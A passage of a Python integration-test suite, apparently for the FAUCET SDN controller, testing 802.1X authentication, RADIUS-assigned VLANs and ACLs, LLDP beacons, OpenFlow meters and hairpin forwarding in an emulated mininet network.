self.set_port_down(port_no1)
self.assertFalse(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False, expect_success=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
wpa_status = self.get_wpa_status(
self.eapol1_host, self.get_wpa_ctrl_path(self.eapol1_host))
self.assertNotEqual('SUCCESS', wpa_status)
# Kill supplicant so cant reply to the port up identity request.
self.terminate_wpasupplicant(self.eapol1_host)
self.post_test_checks()
class Faucet8021XIdentityOnPortUpTest(Faucet8021XBase):
def test_untagged(self):
port_no1 = self.port_map['port_1']
# start wpa sup, logon, then send id request.
self.set_port_up(port_no1)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.set_port_down(port_no1)
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
def port_up(port):
self.set_port_up(port)
self.wait_8021x_flows(port)
username = 'user'
username_bytes = ''.join(('%2x' % ord(c) for c in username))
tcpdump_filter = ' or '.join((
self._success_eapol_filter(True),
self._eapol_filter(('ether[23:4] == 0x%s' % username_bytes,))))
tcpdump_txt = self.tcpdump_helper(
self.eapol1_host, tcpdump_filter, [
lambda: port_up(port_no1)],
timeout=30, vflags='-vvv', packets=2)
for req_str in (
'Identity: %s' % username, # supplicant replies with username
'Success', # supplicant success
):
self.assertTrue(req_str in tcpdump_txt, msg='%s not in %s' % (req_str, tcpdump_txt))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True, retries=10)
self.post_test_checks()
class Faucet8021XPeriodicReauthTest(Faucet8021XBase):
SESSION_TIMEOUT = 15
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_labels1 = self.port_labels(port_no1)
self.set_port_up(port_no1)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
last_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels1, default=0)
for _ in range(4):
for _ in range(self.SESSION_TIMEOUT * 2):
total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels1, default=0)
if total > last_total:
break
time.sleep(1)
self.assertGreater(total, last_total, msg='failed to successfully re-auth')
last_total = total
self.post_test_checks()
class Faucet8021XConfigReloadTest(Faucet8021XBase):
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
self.wait_8021x_flows(port_no1)
self.wait_8021x_flows(port_no2)
conf = self._get_faucet_conf()
conf['dps'][self.DP_NAME]['interfaces'][port_no1]['dot1x'] = False
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True)
self.wait_8021x_flows(port_no2)
self.post_test_checks()
class Faucet8021XCustomACLLoginTest(Faucet8021XBase):
"""Ensure that 8021X Port ACLs Work before and after Login"""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
auth_acl:
- rule:
dl_type: 0x800 # Allow ICMP / IPv4
ip_proto: 1
actions:
allow: True
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
noauth_acl:
- rule:
dl_type: 0x800 # Deny ICMP / IPv4
ip_proto: 1
actions:
allow: False
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
auth_acl: auth_acl
noauth_acl: noauth_acl
interfaces:
%(port_1)d:
name: b1
description: "b1"
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_acl: True
%(port_2)d:
name: b2
description: "b2"
native_vlan: 100
# 802.1X client.
dot1x: True
dot1x_acl: True
%(port_3)d:
name: b3
description: "b3"
native_vlan: 100
# ping host.
%(port_4)d:
name: b4
description: "b4"
output_only: True
# "NFV host - interface used by controller."
"""
def test_untagged(self):
self.verify_host_success(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, False)
self.post_test_checks()
class Faucet8021XCustomACLLogoutTest(Faucet8021XCustomACLLoginTest):
"""Ensure that 8021X Port ACLs Work before and after Logout"""
def test_untagged(self):
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XMABTest(Faucet8021XSuccessTest):
"""Ensure that 802.1x Port Supports Mac Auth Bypass."""
DOT1X_EXPECTED_EVENTS = [{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC',
'status': 'success'}},
]
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_mab: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: 100
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
def start_freeradius(self):
# Add the host mac address to the FreeRADIUS config
self.freeradius_user_conf += '\n{0} Cleartext-Password := "{0}"'.format(
str(self.eapol1_host.MAC()).replace(':', '')
)
return super().start_freeradius()
def test_untagged(self):
port_no1 = self.port_map['port_1']
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.eapol1_host.run_dhclient(self.tmpdir)
self.wait_until_matching_lines_from_faucet_log_files(r'.*AAA_SUCCESS.*')
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.assertEqual(
1,
self.scrape_prometheus_var('port_dot1x_success_total', labels=self.port_labels(port_no1), default=0))
self.post_test_checks()
class Faucet8021XDynACLLoginTest(Faucet8021XCustomACLLoginTest):
"""Ensure that 8021X Port ACLs Work before and after Logout"""
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'success'}},
]
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="filter_id_user_accept"
password="accept_pass"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="filter_id_user_deny"
password="deny_pass"
}
"""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
accept_acl:
dot1x_assigned: True
rules:
- rule:
dl_type: 0x800 # Allow ICMP / IPv4
ip_proto: 1
actions:
allow: True
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
deny_acl:
dot1x_assigned: True
rules:
- rule:
dl_type: 0x800 # Deny ICMP / IPv4
ip_proto: 1
actions:
allow: False
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
name: b1
description: "b1"
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_dyn_acl: True
%(port_2)d:
name: b2
description: "b2"
native_vlan: 100
# 802.1X client.
dot1x: True
dot1x_dyn_acl: True
%(port_3)d:
name: b3
description: "b3"
native_vlan: 100
# ping host.
%(port_4)d:
name: b4
description: "b4"
output_only: True
# "NFV host - interface used by controller."
"""
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XDynACLLogoutTest(Faucet8021XDynACLLoginTest):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'logoff'}}
]
def test_untagged(self):
port_no1 = self.port_map['port_1']
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XVLANTest(Faucet8021XSuccessTest):
"""Test that two hosts are put into vlans.
Same VLAN, Logoff, diff VLANs, port flap."""
CONFIG_GLOBAL = """vlans:
100:
vid: 100
description: "untagged"
radiusassignedvlan1:
vid: %u
description: "untagged"
dot1x_assigned: True
radiusassignedvlan2:
vid: %u
description: "untagged"
dot1x_assigned: True
""" % (mininet_test_base.MAX_TEST_VID - 1,
mininet_test_base.MAX_TEST_VID)
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: radiusassignedvlan1
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
RADIUS_PORT = 1940
DOT1X_EXPECTED_EVENTS = []
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="vlanuser1001"
password="password"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="vlanuser2222"
password="milliphone"
}
"""
def test_untagged(self):
vid = 100 ^ mininet_test_base.OFPVID_PRESENT
radius_vid1 = (mininet_test_base.MAX_TEST_VID - 1) ^ mininet_test_base.OFPVID_PRESENT
radius_vid2 = mininet_test_base.MAX_TEST_VID ^ mininet_test_base.OFPVID_PRESENT
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
port_no3 = self.port_map['port_3']
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.wait_until_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid1])
self.wait_until_matching_flow(
{'vlan_vid': radius_vid1},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no3])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid2},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
# check ports are back in the right vlans.
self.wait_until_no_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid1])
self.wait_until_matching_flow(
{'in_port': port_no1},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % vid])
# check flood ports are in the right vlans
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid1},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no3])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
# check two 1x hosts play nicely. (same dyn vlan)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(
self.eapol1_host, self.eapol2_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(
self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.one_ipv4_ping(
self.eapol2_host, self.eapol1_host.IP(),
require_host_learned=False, expected_result=True)
# check two 1x hosts dont play (diff dyn vlan).
self.assertTrue(self.try_8021x(
self.eapol2_host, port_no2, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(
self.eapol2_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(
self.eapol2_host, self.eapol1_host.IP(),
require_host_learned=False, expected_result=False)
# move host1 to new VLAN
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_2, and_logoff=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.one_ipv4_ping(
self.eapol1_host, self.eapol2_host.IP(),
require_host_learned=False, expected_result=True)
self.wait_until_matching_flow(
{'eth_src': self.eapol1_host.MAC(), 'vlan_vid': radius_vid2},
table_id=self._ETH_SRC_TABLE)
self.wait_until_matching_flow(
{'eth_src': self.eapol1_host.MAC(), 'vlan_vid': radius_vid2},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_src': self.eapol1_host.MAC(), 'vlan_vid': vid},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_src': self.eapol1_host.MAC(), 'vlan_vid': radius_vid1},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol1_host.MAC(), 'vlan_vid': vid},
table_id=self._ETH_DST_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol1_host.MAC(), 'vlan_vid': radius_vid1},
table_id=self._ETH_DST_TABLE)
# test port up/down. removes the dynamic vlan & host cache.
self.flap_port(port_no2)
self.wait_until_matching_flow(
{'in_port': port_no2},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % vid])
self.wait_until_matching_flow(
{'vlan_vid': vid},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
self.wait_until_no_matching_flow(
{'in_port': port_no2},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:%u}' % radius_vid2])
self.wait_until_no_matching_flow(
{'vlan_vid': radius_vid2},
table_id=self._FLOOD_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no1, 'OUTPUT:%s' % port_no2])
self.wait_until_no_matching_flow(
{'eth_src': self.eapol2_host.MAC()},
table_id=self._ETH_SRC_TABLE)
self.wait_until_no_matching_flow(
{'eth_dst': self.eapol2_host.MAC(), 'vlan_vid': radius_vid1},
table_id=self._ETH_DST_TABLE,
actions=['POP_VLAN', 'OUTPUT:%s' % port_no2])
self.post_test_checks()
class FaucetUntaggedRandomVidTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
randvlan:
vid: 100
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: randvlan
%(port_2)d:
native_vlan: randvlan
%(port_3)d:
native_vlan: randvlan
%(port_4)d:
native_vlan: randvlan
"""
def test_untagged(self):
last_vid = None
for _ in range(5):
vid = random.randint(2, mininet_test_base.MAX_TEST_VID)
if vid == last_vid:
continue
self.change_vlan_config(
'randvlan', 'vid', vid, cold_start=True, hup=True)
self.ping_all_when_learned()
last_vid = vid
class FaucetUntaggedNoCombinatorialFloodTest(FaucetUntaggedTest):
CONFIG = """
combinatorial_port_flood: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetUntaggedControllerNfvTest(FaucetUntaggedTest):
def test_untagged(self):
# Name of switch interface connected to last host,
# accessible to controller
last_host = self.hosts_name_ordered()[-1]
switch = self.first_switch()
last_host_switch_link = switch.connectionsTo(last_host)[0]
last_host_switch_intf = [intf for intf in last_host_switch_link if intf in switch.intfList()][0]
super().test_untagged()
# Confirm controller can see switch interface with traffic.
ifconfig_output = self.net.controllers[0].cmd('ifconfig %s' % last_host_switch_intf)
self.assertTrue(
re.search('(R|T)X packets[: ][1-9]', ifconfig_output),
msg=ifconfig_output)
class FaucetUntaggedBroadcastTest(FaucetUntaggedTest):
def test_untagged(self):
super().test_untagged()
self.verify_broadcast()
self.verify_no_bcast_to_self()
self.verify_unicast_not_looped()
class FaucetUntaggedNSLoopTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
acls:
nsonly:
- rule:
dl_type: %u
ip_proto: 58
icmpv6_type: 135
actions:
allow: 1
- rule:
actions:
allow: 0
vlans:
100:
description: "untagged"
""" % IPV6_ETH
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: nsonly
%(port_2)d:
native_vlan: 100
acl_in: nsonly
%(port_3)d:
native_vlan: 100
acl_in: nsonly
%(port_4)d:
native_vlan: 100
acl_in: nsonly
"""
def test_untagged(self):
self.verify_no_bcast_to_self()
class FaucetUntaggedNoCombinatorialBroadcastTest(FaucetUntaggedBroadcastTest):
CONFIG = """
combinatorial_port_flood: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetUntaggedLogRotateTest(FaucetUntaggedTest):
def test_untagged(self):
faucet_log = self.env[self.faucet_controllers[0].name]['FAUCET_LOG']
self.assertTrue(os.path.exists(faucet_log))
os.rename(faucet_log, faucet_log + '.old')
self.assertTrue(os.path.exists(faucet_log + '.old'))
self.flap_all_switch_ports()
self.assertTrue(os.path.exists(faucet_log))
class FaucetUntaggedLLDPTest(FaucetUntaggedTest):
CONFIG = """
lldp_beacon:
send_interval: 5
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
system_name: "faucet"
port_descr: "first_port"
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
@staticmethod
def wireshark_payload_format(payload_str):
formatted_payload_str = ''
groupsize = 4
for payload_offset in range(len(payload_str) // groupsize):
char_count = payload_offset * 2
if char_count % 0x10 == 0:
formatted_payload_str += '0x%4.4x: ' % char_count
payload_fragment = payload_str[payload_offset * groupsize:][:groupsize]
formatted_payload_str += ' ' + payload_fragment
return formatted_payload_str
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = 'ether proto 0x88cc'
timeout = 5 * 3
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd('sleep %u' % timeout)],
timeout=timeout, vflags='-vv', packets=1)
oui_prefix = ''.join(self.FAUCET_MAC.split(':')[:3])
faucet_lldp_dp_id_attr = '%2.2x' % 1
expected_lldp_dp_id = ''.join((
oui_prefix,
faucet_lldp_dp_id_attr,
binascii.hexlify(str(self.dpid).encode('UTF-8')).decode()))
for lldp_required in (
r'%s > 01:80:c2:00:00:0e, ethertype LLDP' % self.FAUCET_MAC,
r'Application type \[voice\] \(0x01\), Flags \[Tagged\]Vlan id 50',
r'System Name TLV \(5\), length 6: faucet',
r'Port Description TLV \(4\), length 10: first_port',
self.wireshark_payload_format(expected_lldp_dp_id)):
self.assertTrue(
re.search(lldp_required, tcpdump_txt),
msg='%s: %s' % (lldp_required, tcpdump_txt))
class FaucetLLDPIntervalTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG = """
lldp_beacon:
send_interval: 10
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
system_name: "faucet"
port_descr: "first_port"
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = 'ether proto 0x88cc'
interval = 10
timeout = interval * 3
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd('sleep %u' % timeout)],
# output epoch secs
timeout=timeout, vflags='-tt', packets=2)
timestamps = re.findall(r'(\d+)\.\d+ [0-9a-f:]+ \> [0-9a-f:]+', tcpdump_txt)
timestamps = [int(timestamp) for timestamp in timestamps]
self.assertTrue(timestamps[1] - timestamps[0] >= interval, msg=tcpdump_txt)
class FaucetUntaggedLLDPDefaultFallbackTest(FaucetUntaggedTest):
CONFIG = """
lldp_beacon:
send_interval: 5
max_per_interval: 5
interfaces:
%(port_1)d:
native_vlan: 100
lldp_beacon:
enable: True
org_tlvs:
- {oui: 0x12bb, subtype: 2, info: "01406500"}
"""
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = 'ether proto 0x88cc'
timeout = 5 * 3
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd('sleep %u' % timeout)],
timeout=timeout, vflags='-vv', packets=1)
for lldp_required in (
r'%s > 01:80:c2:00:00:0e, ethertype LLDP' % self.FAUCET_MAC,
r'Application type \[voice\] \(0x01\), Flags \[Tagged\]Vlan id 50',
r'System Name TLV \(5\), length 8: faucet-1',
r'Port Description TLV \(4\), length [1-9]: b%u' % self.port_map['port_1']):
self.assertTrue(
re.search(lldp_required, tcpdump_txt),
msg='%s: %s' % (lldp_required, tcpdump_txt))
class FaucetUntaggedMeterParseTest(FaucetUntaggedTest):
REQUIRES_METERS = True
OVS_TYPE = 'user'
CONFIG_GLOBAL = """
meters:
lossymeter:
meter_id: 1
entry:
flags: "KBPS"
bands:
[
{
type: "DROP",
rate: 100
}
]
acls:
lossyacl:
- rule:
actions:
meter: lossymeter
allow: 1
vlans:
100:
description: "untagged"
"""
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
db: 'stats_file'
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
db: 'state_file'
meter_stats:
dps: ['%s']
type: 'meter_stats'
interval: 5
db: 'meter_file'
meter_stats_prom:
dps: ['%s']
type: 'meter_stats'
db: 'prometheus'
interval: 5
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME, self.DP_NAME)
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
"""
config_ports = {'gauge_prom_port': None}
def _get_gauge_meter_config(self, faucet_config_file,
monitor_stats_file,
monitor_state_file,
monitor_meter_stats_file):
"""Build Gauge Meter config."""
return """
faucet_configs:
- %s
watchers:
%s
dbs:
stats_file:
type: 'text'
file: %s
state_file:
type: 'text'
file: %s
meter_file:
type: 'text'
file: %s
%s
""" % (faucet_config_file, self.get_gauge_watcher_config(),
monitor_stats_file, monitor_state_file, monitor_meter_stats_file,
self.GAUGE_CONFIG_DBS)
def _init_gauge_config(self):
gauge_config = self._get_gauge_meter_config(
self.faucet_config_path,
self.monitor_stats_file,
self.monitor_state_file,
self.monitor_meter_stats_file)
if self.config_ports:
gauge_config = gauge_config % self.config_ports
self._write_yaml_conf(self.gauge_config_path, yaml.safe_load(gauge_config))
def test_untagged(self):
"""All hosts on the same untagged VLAN should have connectivity."""
# TODO: userspace DP port status not reliable.
self.ping_all_when_learned()
class FaucetUntaggedApplyMeterTest(FaucetUntaggedMeterParseTest):
CONFIG = """
interfaces:
%(port_1)d:
acl_in: lossyacl
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
super().test_untagged()
first_host, second_host = self.hosts_name_ordered()[:2]
error('metered ping flood: %s' % first_host.cmd(
'ping -c 1000 -f %s' % second_host.IP()))
# Require meter band bytes to match.
self.wait_until_matching_lines_from_file(
r'.+faucet-1-1-byte-band-count.+[1-9].+',
self.monitor_meter_stats_file)
meter_labels = {
'dp_id': self.dpid,
'dp_name': self.DP_NAME,
'meter_id': 1
}
byte_band_count = self.scrape_prometheus_var(
'of_meter_byte_band_count', labels=meter_labels, controller=self.gauge_controller.name)
self.assertTrue(byte_band_count)
class FaucetUntaggedMeterAddTest(FaucetUntaggedMeterParseTest):
NUM_FAUCET_CONTROLLERS = 1
def test_untagged(self):
super().test_untagged()
conf = self._get_faucet_conf()
conf['meters']['lossymeter2'] = {
'meter_id': 2,
'entry': {
'flags': ['PKTPS'],
'bands': [{'rate': '1000', 'type': 'DROP'}]
},
}
conf['acls']['lossyacl2'] = [{
'rule': {
'actions': {
'allow': 1,
'meter': 'lossymeter2'
}
}
}]
port_conf = conf['dps'][self.DP_NAME]['interfaces'][self.port_map['port_2']]
port_conf['acls_in'] = ['lossyacl2']
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True, hup=True)
self.wait_until_matching_lines_from_file(
r'.+\'meter_id\'\: 2+',
self.get_matching_meters_on_dpid(self.dpid))
port_conf['acls_in'] = []
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True)
self.wait_until_no_matching_lines_from_file(
r'.+\'meter_id\'\: 2+',
self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedMeterModTest(FaucetUntaggedMeterParseTest):
def test_untagged(self):
super().test_untagged()
conf = self._get_faucet_conf()
conf['dps'][self.DP_NAME]['interfaces'][self.port_map['port_1']]['acls_in'] = ['lossyacl']
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True, hup=True)
self.wait_until_matching_lines_from_file(
r'.+KBPS+',
self.get_matching_meters_on_dpid(self.dpid))
conf['meters']['lossymeter']['entry']['flags'] = ['PKTPS']
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True, hup=True)
self.wait_until_matching_lines_from_file(
r'.+PKTPS+',
self.get_matching_meters_on_dpid(self.dpid))
class FaucetUntaggedHairpinTest(FaucetUntaggedTest):
NETNS = True
CONFIG = """
interfaces:
%(port_1)d:
hairpin: True
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Create macvlan interfaces, with one in a separate namespace,
# to force traffic between them to be hairpinned via FAUCET.
first_host, second_host = self.hosts_name_ordered()[:2]
macvlan1_intf = 'macvlan1'
macvlan1_ipv4 = '10.0.0.100'
macvlan2_intf = 'macvlan2'
macvlan2_ipv4 = '10.0.0.101'
self.add_macvlan(first_host, macvlan1_intf, ipa=macvlan1_ipv4, mode='vepa')
self.add_macvlan(first_host, macvlan2_intf, mode='vepa')
macvlan2_mac = self.get_host_intf_mac(first_host, macvlan2_intf)
netns = self.hostns(first_host)
setup_cmds = []
setup_cmds.extend(
['ip link set %s netns %s' % (macvlan2_intf, netns)])
for exec_cmd in (
('ip address add %s/24 brd + dev %s' % (
macvlan2_ipv4, macvlan2_intf),
'ip link set %s up' % macvlan2_intf)):
setup_cmds.append('ip netns exec %s %s' % (netns, exec_cmd))
self.quiet_commands(first_host, setup_cmds)
self.one_ipv4_ping(first_host, macvlan2_ipv4, intf=macvlan1_ipv4)
self.one_ipv4_ping(first_host, second_host.IP())
# Verify OUTPUT:IN_PORT flood rules are exercised.
self.wait_nonzero_packet_count_flow(
{'in_port': self.port_map['port_1'],
'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE, actions=['OUTPUT:IN_PORT'])
self.wait_nonzero_packet_count_flow(
{'in_port': self.port_map['port_1'],
'dl_dst': macvlan2_mac},
table_id=self._ETH_DST_HAIRPIN_TABLE, actions=['OUTPUT:IN_PORT'])
class FaucetUntaggedGroupHairpinTest(FaucetUntaggedHairpinTest):
CONFIG = """
group_table: True
interfaces:
%(port_1)d:
hairpin: True
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetUntaggedTcpIPv4IperfTest(FaucetUntaggedTest):
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_address(first_host.IP())
